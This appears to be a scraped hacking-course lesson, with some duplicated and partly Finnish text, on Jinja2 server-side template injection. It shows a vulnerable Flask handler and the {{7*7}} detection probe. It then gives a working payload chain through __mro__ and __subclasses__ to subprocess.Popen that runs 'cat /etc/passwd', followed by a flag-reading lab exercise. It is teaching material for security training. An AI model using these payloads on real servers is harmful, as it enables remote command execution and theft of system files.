Python Jinja2 is a templating engine that allows the use of Python code to create HTML templates. Jinja2 is often used together with Python web frameworks like Flask, but it can also be used independently.

Using Jinja2 to create HTML templates is quite simple. For example, you can create a Jinja2 template where you can use variables, conditional statements, and loops. Here are a few examples:

This template sets the variable name to the value "Matti" and then prints the greeting "Hello, Matti!" to the HTML tag <p>.

This template checks if the value of the age variable is greater than or equal to 18 and prints "You are of legal age" or "You are a minor" accordingly.

This template creates a list within the <ul> tag, where each list item (<li>) contains the product name and price. This template uses a for loop to go through the list of products.

These are just a few examples of using Jinja2. Jinja2 can be used in many different ways and it has a lot of features that make creating HTML templates flexible and efficient.

Jinja, like other template engines, can be used incorrectly and cause a nightmarish security hole in the application.

Here is an example of a vulnerable Flask application that incorrectly uses the Jinja2 template engine, allowing user input to affect the template itself, instead of just the data given to the template as it should have been.

The traditional way to detect template injections is to input

in the input and see if the application returns "49" in the same location in the HTML. This is an almost certain sign of a template injection.

Assuming you want to execute operating system commands to read the file /etc/passwd from the server's disk. In this case, you would like to inject the following code into the template:

 enables running a command in the shell, and 

, from which you can read more if you want 

However, Jinja2 does not support this syntax. In Jinja2 templates, you can call a function, but the function must already be loaded in the application's memory, and you cannot use import.

However, you can try to find a class from the memory that suits your purposes and call it. In practice, this can be done conveniently by listing all the loaded subclasses of the 

Obtaining the __class__ and __mro__ of an object type

First of all, you need to access the object type. This cannot be done directly in Jinja, for example, this would cause an error in Jinja:

Although in the normal Python context object.__name__ would output 'object'.

However, you can search for objects using the 

Python module search order determines how Python finds and loads modules when they are imported into another module.

 is an attribute that can be found in all classes in Python and it contains the inheritance order defined by the class. The 

 attribute is a useful tool for examining and understanding complex inheritance structures, and it is even more useful in template injections.

For example, in Python, the string (str) is derived from the object, so str.__mro__ returns a list (str, object).

In other words, the following two codes do the same thing:

However, in the Jinja context, we cannot directly use the str type either, we have to get it as well. On the other hand, we can get it by creating a string and calling its 

Finding a suitable class using __subclasses__

 is a function available on all Python classes, which returns a list of all immediate subclasses of the class.

There are generally a lot of classes, it's a good idea to copy them to a text editor and search for a suitable one. In this case, interesting is 

 which is exactly the type we wanted to use for executing operating system commands.

The next step is to find out the index of the class, which means how many classes before your desired class. It needs to be retrieved by number. You could copy the whole string into a text editor and find out which number "subprocess.Popen" is on the list, but it is not only a bit slow but also prone to errors.

It is more stylish to use the Jinja2 template engine to build the view for you.

The code may look a bit cryptic if you're not familiar with Jinja, but in practice it's a for loop that goes through all the classes and prints both the class order number, module, and class name inside a paragraph (<p>) on the page.

The number is 6. Remember that this varies by application, so it is important that you understand the concept and know how to find the appropriate class and correct index for yourself, regardless of the application.

Yes! The right index. Now we can access the subprocess.Popen class. It's just a short distance to victory from here.

This application also contains subprocess.Popen

Read the flag from the file /usr/src/app/flag.txt

Jinja2 Template Injection

Jinja2 is itself safe and excellent alternative to old-fashioned HTML building. But the template must be kept static, preferably in its own file from which it is loaded. Only the template data can change during code execution, not the structure of the template.

Jinja2 on itsessään turvallinen ja mainio vaihtoehto vanhanaikaiselle HTML-rakentamiselle. Mutta templaatti täytyy pitää staattisena, mieluiten ihan omassa tiedostossaan josta se ladataan. Vain templaatin data saa vaihtua koodin suorituksen aikana, ei templaatin rakenne.

Safe use of Jinja2

Jinja2 turvallinen käyttö

## Jinja2

Python Jinja2 is a templating engine that allows the use of Python code to create HTML templates. Jinja2 is often used together with Python web frameworks like Flask, but it can also be used independently.

Using Jinja2 to create HTML templates is quite simple. For example, you can create a Jinja2 template where you can use variables, conditional statements, and loops. Here are a few examples:

### Using Variables

```python
{% set name = &quot;Matt&quot; %}<p> Greetings, {{ name }}!</p>
```

This template sets the variable name to the value "Matti" and then prints the greeting "Hello, Matti!" to the HTML tag <p>.

### 
Using conditionals

```python
{% if age &gt;= 18%}<p> You are of age!</p> {% else %}<p> You are a minor.</p> {% endif %}
```

This template checks if the value of the age variable is greater than or equal to 18 and prints "You are of legal age" or "You are a minor" accordingly.

### Using loops

```python
<ul>{% for product in products %}<li> {{ product.name }} - {{ product.price }}€</li> {% endfor %}</ul>
```

This template creates a list within the <ul> tag, where each list item (<li>) contains the product name and price. This template uses a for loop to go through the list of products.

These are just a few examples of using Jinja2. Jinja2 can be used in many different ways and it has a lot of features that make creating HTML templates flexible and efficient.

---

## Injection

Jinja, like other template engines, can be used incorrectly and cause a nightmarish security hole in the application.

Here is an example of a vulnerable Flask application that incorrectly uses the Jinja2 template engine, allowing user input to affect the template itself, instead of just the data given to the template as it should have been.

```python
if request.method == &#39;POST&#39;: name = request.form[&#39;name&#39;] template = f&#39;<h1> Welcome, { name }!</h1> &#39; return render_template_string(template) else: template = &#39;&#39;&#39;<form method="POST"> <label for="name">Name:</label><input type="text" name="name" id="name"> <button type="submit">send</button></form> &#39;&#39;&#39; return render_template_string(template)
```

---

## Detecting Vulnerabilities

The traditional way to detect template injections is to input** \{\{7\*7\}\} **in the input and see if the application returns "49" in the same location in the HTML. This is an almost certain sign of a template injection.

Let's try:

![](sanity:image-08fa81f97b9e63f041ac526385687250f51e7048-912x130-png)

![](sanity:image-a9c8ea783af19b2abaca7011b39cc63dc81a7f2c-1058x196-png)

Yes, the application is vulnerable.

---

## Exploiting Vulnerabilities

Assuming you want to execute operating system commands to read the file /etc/passwd from the server's disk. In this case, you would like to inject the following code into the template:

```python
import subprocess; subprocess.Popen("cat /etc/passwd",shell=True,stdout=-1).communicate()
```

(If you are wondering, **shell=True** enables running a command in the shell, and **stdout=-1** means **stdout=subprocess.PIPE**, from which you can read more if you want [here](https://docs.python.org/3/library/subprocess.html#subprocess.PIPE)).

However, Jinja2 does not support this syntax. In Jinja2 templates, you can call a function, but the function must already be loaded in the application's memory, and you cannot use import.

However, you can try to find a class from the memory that suits your purposes and call it. In practice, this can be done conveniently by listing all the loaded subclasses of the **object** class. This can be achieved with the **\_\_class\_\_**, **\_\_mro\_\_**, and **\_\_subclasses\_\_** attributes.

---

## Obtaining the \_\_class\_\_ and \_\_mro\_\_ of an object type

First of all, you need to access the object type. This cannot be done directly in Jinja, for example, this would cause an error in Jinja:

```python
{{object.__name__}}
```

Although in the normal Python context object.\_\_name\_\_ would output 'object'.

```python
>>> object.__name__
'object'
```

However, you can search for objects using the **object** type with any variable through its **\_\_mro\_\_** attribute.

Python module search order determines how Python finds and loads modules when they are imported into another module.

**\_\_mro\_\_** is an attribute that can be found in all classes in Python and it contains the inheritance order defined by the class. The **\_\_mro\_\_** attribute is a useful tool for examining and understanding complex inheritance structures, and it is even more useful in template injections.

For example, in Python, the string (str) is derived from the object, so str.\_\_mro\_\_ returns a list (str, object).

```python
>>> str.__mro__
(<class 'str'>, <class 'object'>)
```

In other words, the following two codes do the same thing:

```python
>>> object.__name__
'object'
```

```python
>>> str.__mro__[1].__name__
'object
```

However, in the Jinja context, we cannot directly use the str type either, we have to get it as well. On the other hand, we can get it by creating a string and calling its **\_\_class\_\_** attribute.

```python
>>> 'hi'.__class__
<class 'str'>
```

By combining both the (**\_\_class\_\_** and **\_\_mro\_\_** attributes), we can retrieve the **object** type in a Jinja-approved way.

```python
>>> ''.__class__.__mro__[1]
<class 'object'
```

![](sanity:image-62cf92609b01ccb1f6a05ede7325e4d045d8e2d4-846x120-png)

---

## Finding a suitable class using \_\_subclasses\_\_

**\_\_subclasses\_\_** is a function available on all Python classes, which returns a list of all immediate subclasses of the class.

```python
''.__class__.__mro__[1].__subclasses__()
[<class 'type'>, <class 'weakref'>, <class 'weakcallableproxy'>, <class 'weakproxy'>, <class 'int'>, <class 'bytearray'>, <class 'bytes'>, <class 'list'>, <class 'NoneType'>, <class 'NotImplementedType'>, <class 'traceback'>, <class 'super'>, <class 'range'>, <class 'dict'>, < class 'dict_keys'>, <class 'dict_values'>, <class 'dict_items'>, <class 'odict_iterator'>, <class 'set'>, <class 'str'>, <class 'slice'>... <class 'subprocess.Popen'>...
```

There are generally a lot of classes, it's a good idea to copy them to a text editor and search for a suitable one. In this case, interesting is **<class 'subprocess.Popen'>** which is exactly the type we wanted to use for executing operating system commands.

The next step is to find out the index of the class, which means how many classes before your desired class. It needs to be retrieved by number. You could copy the whole string into a text editor and find out which number "subprocess.Popen" is on the list, but it is not only a bit slow but also prone to errors.

It is more stylish to use the Jinja2 template engine to build the view for you.

```python
{% set classes=&#39;&#39;.__class__.__mro__[1].__subclasses__() %}{%for c in classes %}<p> {{loop.index-1}} - {{c.__module__}}.{{ c.__name__ }}</p> {% endfor %}
```

The code may look a bit cryptic if you're not familiar with Jinja, but in practice it's a for loop that goes through all the classes and prints both the class order number, module, and class name inside a paragraph (<p>) on the page.

![](sanity:image-5436f511e1a09fa4d9b5bf893b1c3d507153e761-792x488-png)

The number is 6. Remember that this varies by application, so it is important that you understand the concept and know how to find the appropriate class and correct index for yourself, regardless of the application.

We can verify this:

```python
{{''.__class__.__mro__[1].__subclasses__()[6]}}
```

![](sanity:image-66ed89160c0993a22ec2775b993e92b7b3c41372-1132x128-png)

Yes! The right index. Now we can access the subprocess.Popen class. It's just a short distance to victory from here.

```python
{{''.__class__.__mro__[1].__subclasses__()[6]('cat /etc/passwd',shell=True,stdout=-1).communicate()}}
```

![](sanity:image-590df9c154b106c3b0f4267e153c5b6058a11e3f-1192x454-png)

---

## Exercise

Try the attack yourself next! Two tips:

- This application also contains subprocess.Popen
- Index is not 6, but considerably bigger.

@exercise b5e15686db1a

@embed 85b28eb4e749


Python Jinja2 Template Injections

HTML is typically built with templates precisely to avoid injection vulnerabilities, but sometimes it happens so miserably that the injection hits the template itself, and in that case the consequences are serious.

Typically, HTML is built with templates in order to avoid injection vulnerabilities, but sometimes it happens unfortunately that the injection hits the template itself, and in this case the consequences are serious.

Python Jinja2 Template Injections

Jinja2

Using Variables

Using loops

Learn to hack — start here